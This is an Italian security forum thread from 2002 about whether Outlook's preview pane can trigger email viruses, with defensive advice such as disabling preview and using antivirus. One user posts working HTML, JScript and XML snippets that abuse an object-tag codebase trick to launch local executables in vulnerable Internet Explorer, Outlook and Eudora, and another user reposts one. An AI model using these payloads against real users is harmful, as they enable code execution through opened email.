Condividi:        

anteprima di Outlook

Come rimuovere virus e spyware? Le carte di credito sono davvero sicure in rete? È possibile navigare anonimi? Con quali programmi tutelare la propria privacy? Come proteggere i file importanti? Se volete una risposta a queste e altre domande questo è il luogo giusto!

Moderatori: m.paolo, kadosh, Luke57

anteprima di Outlook

Postdi robywan » 23/04/02 08:25

Leggo da parecchie parti che basta l'apertura del messaggio di posta per attivare alcuni tipi di virus, senza neanche aprire allegati.
Leggo anche che basta vedere l'anteprima (mi riferisco ad Outlook), che in pratica equivale all'apertura del messaggio, per attivare gli infami... :x

Se però disattivo da Visualizza > Layout l'anteprima dei messaggi, sono un briciolo più tutelato?
Mi viene da pensare a questo perchè il messaggio, anche se selezionato, non passa alla visualizzazione "già letto".
OK, non vuol dire niente, si può segnare nuovamente come non letto, però, se non c'è alcuna elaborazione su di esso...

Grazie,
Rw
robywan
Utente Junior
 
Post: 68
Iscritto il: 28/08/01 01:00
Località: Cuneo

Sponsor
 

Postdi piercing » 23/04/02 09:10

sicuramente sei MOLTO + tutelato se elimini l'anteprima dei messaggi.
Questo perchè non mandi in esecuzione nulla e non apri l'email a meno che tu non lo voglia esplicitamente fare...
in questa maniera puoi vedere cmq se c'è un mittente che non conosci, o degli allegati sospetti (exe, pif, com, bat e così via...) senza aprire il messaggio e quindi puoi decidere direttamente tu cosa aprire....
io lo levo sempre e comunque.... anche se capisco che l'utilizzo è un pò più pesante... ma reinstallare tutto lo è di più!! :lol:
Avatar utente
piercing
Moderatore
 
Post: 7569
Iscritto il: 10/04/02 10:34
Località: Roma

Postdi Triumph Of Steel » 23/04/02 09:10

Che io sappia (almeno fino adesso su XP, OE 6 è stato cosi), Outlook ti chiede se vuio "aprire" o "salvare" il file che è stato lanciato facendo l'Anteprima ...
quindi basta annullare...

e basta avere un buon AntiVirus... Sempre!
Avatar utente
Triumph Of Steel
Moderatore
 
Post: 7852
Iscritto il: 22/08/01 01:00

:)

Postdi BianConiglio » 23/04/02 09:14

E' possibile eseguire sia l'allegato che un file presente sul sistema.
Le versioni inferiori alla 6 di IE ( e naturalmente outlook <6) sono vulnerabili a questo e ad altri sistemi...

Per eseguire un file sulla macchina è sufficiente conoscere la locazione specifica dell'eseguibile e scrivere 3 righe di codice nel corpo della mail.

<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/filedaeseguireinlocale.exe"></object>';
</script>


Questo è perl' xml

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>


E' anche possibile sfruttare la stessa idea per eseguire un allegato che venga automaticamente copiato in una cartella default ( es per Eudora )
E' anche possibile combinare questo tipo di exploit con altre vulnerabilità ( tipo quella degli wmv che permettono di aprire pagine htm in locale o in rete che possono contenere codice malizioso )

<style>
a { display:none; }
</style>
<body>
Hello, Eudora.
<xml:namespace prefix="t"/>
<t:video style="display:none;behavior:url(#default#time);" t:src="file://C:/Progra~1/Qualcomm/Eudora/Attach/videochevienelanciatoeapreunapaginahtm.wmv"/>
</body>


Non inserisco altri codici poichè quelli più "brutali" ( esecuzione di codice contenuto all'interno del corpo della mail e via dicendo ) potrebbero essere captati da orecchie lameresche :evil: ...per questo me ne sto zitto...

Ricorco che le versioni di Outlook e IE superiori o uguali alla 6 non sono vulnerabili da questi attacchi riportati...ma lo sono da altri che non inserisco..

Altre cazzatine si possono fare in java....soprattutto loop...
Insomma..ci si può sbizzarriere..

Ciauzzz
BianConiglio
Utente Senior
 
Post: 4710
Iscritto il: 26/12/01 01:00
Località: Varese / Lugano

Postdi piercing » 23/04/02 09:19

beh.. non è che cmq in questa maniera sia possibile fare molto...
al massimo un blocco della macchina...
e basta disattivare script e ActiveX nelle email...
finche MS continuerà ad integrare così i suoi ambienti non ci sarà niente da fare.... esisteranno sempre 1000 metodi analoghi...
cmq come sempre nel dubbio basta aprire le email in formato testo... o salvarle come .eml e guardarle con un editor di testo...
ma cmq con l'anteprima attivata tutto questo non lo puoi fare... se non quando è troppo tardi....
Avatar utente
piercing
Moderatore
 
Post: 7569
Iscritto il: 10/04/02 10:34
Località: Roma

quindi...

Postdi robywan » 23/04/02 09:44

...vabbè, farò bene a rinunciare all'anteprima...

Altra cosa: avete presenti quei siti simpatici dove capita di trovare numeri e eseguibili relativi a certe applicazioni di uso frequente...

Capita che uno vi arriva e cominciano ad aprirsi decine e decine di finestre.
Vada per quelle normali che si chiudono normalmente,
vada per quelle a tutto schermo, che comunque si dominano,
ma l'altro giorno ne ho vista una che si chiamava qualcosa tipo "posta in arrivo"..., tra l'altro selezionandola non compariva nulla...
Devo preoccuparmi per la mia rubrica o altro? :(

Rw

P.S.: newbie, utente junior e senior in base a cosa sono assegnati?
robywan
Utente Junior
 
Post: 68
Iscritto il: 28/08/01 01:00
Località: Cuneo

Postdi BianConiglio » 23/04/02 10:02

"beh.. non è che cmq in questa maniera sia possibile fare molto... "



Mica troppo....si possono eseguire tutti glie seguibili che vuoi....... :diavolo:
BianConiglio
Utente Senior
 
Post: 4710
Iscritto il: 26/12/01 01:00
Località: Varese / Lugano

Postdi piercing » 23/04/02 10:11

beh... ancora un format pare che non si riesca a fare!! 8)

in genere gli eseguibili presenti sulla macchina non sono pericolosi...

(voglio dire che puoi avviare anche 100000000 volte la calcolatrice o esaurire le risorse di sistema... ma in quanto ad atti pericolosi... insomma....)

è ovvio che se lo unisci a programmini scaricati da file su internet...
a vbs che nascondi in paginette html...
a porte aprete e non monitorate...
a risorse condivise....
e così via... troppe se ne possono fare...

cmq siamo sempre nel campo del tutto è possibile....

io continuo a vedere un computer su 10 che naviga in internet senza la minima protezione con tutti gli HD condivisi senza uno straccio di password...

P.S.: newbie, utente junior e senior in base a cosa sono assegnati?


in funzione di quanti post sono stati inviati
Avatar utente
piercing
Moderatore
 
Post: 7569
Iscritto il: 10/04/02 10:34
Località: Roma

Postdi dado » 23/04/02 11:31

Per le decine di finestre che ti si aprono quando vai su siti che distribuiscono serial e crack o simili, una soluzione c'è (se non risolve tutto, almeno limiti decisamente il traffico di popup): è un programmino che si chiama popup killer. Lo trovi un pò ovunque, basta inserire in un motore di ricerca....
Quella finestra che hai detto non si riusciva a chiudere con ALT+F4?

X qt riguarda OE e le email, finchè sono in formato text, anche se hanno 50 virus allegati, non c'è pericolo per la preview. Il problema sono le email in formato HTML, e solo per quelle è utile disattivare la preview.
Dipende dai gusti... se la cosa fa sentire + sicuri, si può anche fare...

House: "Vede, tutti pensano che sia un paziente a causa del bastone"
Wilson: "Allora perchè non indossa un camice bianco come tutti noi?"
House: "Perchè altrimenti pensano che sia un medico".
Avatar utente
dado
Utente Senior
 
Post: 16208
Iscritto il: 21/08/01 01:00
Località: La Città dei Sette Assedi

ma... che differenza c'è...

Postdi robywan » 23/04/02 15:44

ho provato il codicillo che ti apre un'applicazione, come già vidi su alcuni siti.

<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/filedaeseguireinlocale.exe"></object>';
</script>


Che differenza c'è tra mettere il tag object entro un js piuttosto che metterlo direttamente nell'html?

Rw
robywan
Utente Junior
 
Post: 68
Iscritto il: 28/08/01 01:00
Località: Cuneo

Re: quindi...

Postdi Nemok » 23/04/02 19:10

robywan ha scritto:.
Capita che uno vi arriva e cominciano ad aprirsi decine e decine di finestre.


Popup killer lo trovi acnhe compreso nel tool di History Killer,presente nella sezione download.

P.S.: newbie, utente junior e senior in base a cosa sono assegnati?


Al numero di messaggi postati,ora non ricordo precisamente le cifre...
Nel 1968 la potenza operativa di 2 C-64 hanno portato un razzo sulla luna. Oggi la potenza operativa di un Athlon 4000+ viene usata per far girare Windows XP....Qualcosa deve essere andato storto....
--Powered by Debian Sid/unstable on 2.6.10--
Nemok
Utente Senior
 
Post: 1420
Iscritto il: 04/09/01 01:00
Località: Roma

in risposta a dado

Postdi robywan » 24/04/02 09:08

Il pop up in questione era ridotto a icona, non cliccabile (neanche a destra), quindi l'ho chiuso con il classico ctrl+alt+canc
Non aveva la solita iconcina a sinistra (normalmente sui pulsanti delle applicazioni aperte c'è un'icona...), come se fosse una finestra di errore o di download.
La dicitura era preoccupante: "posta in arrivo"...

Rg

-------------------------------------
"SOS signore, se l'ex VP ha un tale DNA, non dovremmo tenere l'ACS fuori TV, xchè senza questo ABC avremmo alla gola l'H2O, o peggio il DDT del KGB..."
robywan
Utente Junior
 
Post: 68
Iscritto il: 28/08/01 01:00
Località: Cuneo

Postdi piercing » 24/04/02 11:26

non ti preoccupare.. è sempre una finestra di explorer opportunamente trattata...
si chiama "chromeless"
va molto in voga ad oggi.... mah... che c'avrà di bello!! :D
Avatar utente
piercing
Moderatore
 
Post: 7569
Iscritto il: 10/04/02 10:34
Località: Roma


Torna a Sicurezza e Privacy


Topic correlati a "anteprima di Outlook":

incollare in Outlook
Autore: valyfilm
Forum: Software Windows
Risposte: 1

Chi c’è in linea

Visitano il forum: Nessuno e 46 ospiti